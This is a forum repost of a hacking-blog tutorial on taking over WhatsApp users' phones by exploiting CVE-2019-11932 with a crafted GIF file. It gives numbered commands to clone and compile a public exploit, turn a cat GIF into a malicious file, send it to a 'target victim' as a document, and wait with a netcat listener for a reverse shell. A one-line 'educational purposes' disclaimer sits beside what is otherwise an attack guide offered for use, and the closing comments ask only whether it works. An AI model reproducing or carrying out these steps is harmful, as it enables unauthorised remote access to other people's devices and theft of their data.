How to Hack Whatsapp with gif file

Hacking WhatsApp Account is one of the top google search terms for people. It is the most used messaging app in the world. Because of that, there has been a rise for hackers trying to hack WhatsApp in the hacking community. Few hacks work as a paid service while some are free and very few are completely skill-based. With the rise in the number of users, WhatsApp Exploits and security breaches have increased tremendously. So we decided to to make a guide on hacking WhatsApp with GIF Hack.

Obviously this post is only for educational purposes but it shows how hackers can hack WhatsApp accounts using only using a gif file.

How to hack WhatsApp with a gif file:

Step 1: Copy and clone the exploit from GitHub with the following command:

git clone https://github.com/awakened1712/CVE-2019-11932

Hack WhatsApp using GIF hack- Shell

Step 2: Change the Directory to the exploit folder with the following command:

cd CVE-2019-11932

Step 3: Compile the exploit with the following command:

gcc -o exploit egif_lib.c exploit.c

Step 4: Download any gif file from the internet. I am going to use a cat.gif since everyone loves cats.

Step 5: Run the exploit with the following command:

./exploit /root/Desktop/cat.gif

Hack WhatsApp using GIF- Shell Command

Step 6: Now the malicious gif file is ready to use. Simply send this gif file to the target WhatsApp.

You need to copy cat.gif file and send it as a Document with WhatsApp to another WhatsApp account user.

Step 7:

nc -lnvp 4444

Successfully Hack WhatsApp Account- Listening to Input

Step 8: Once the file is sent as a document and we need to wait for the target victim to open the file and start WhatsApp Exploit:

Step 9: Once the file is opened you will get a reverse shell as shown below.

Its a regular Linux shell so you can pretty much do anything you want from the shell commands.

Source: myhackingworld
https://myhackingworld.com/how-to-hack-whatsapp-with-a-gif-whatsapp-exploit/

6 Likes

does it work??

1 Like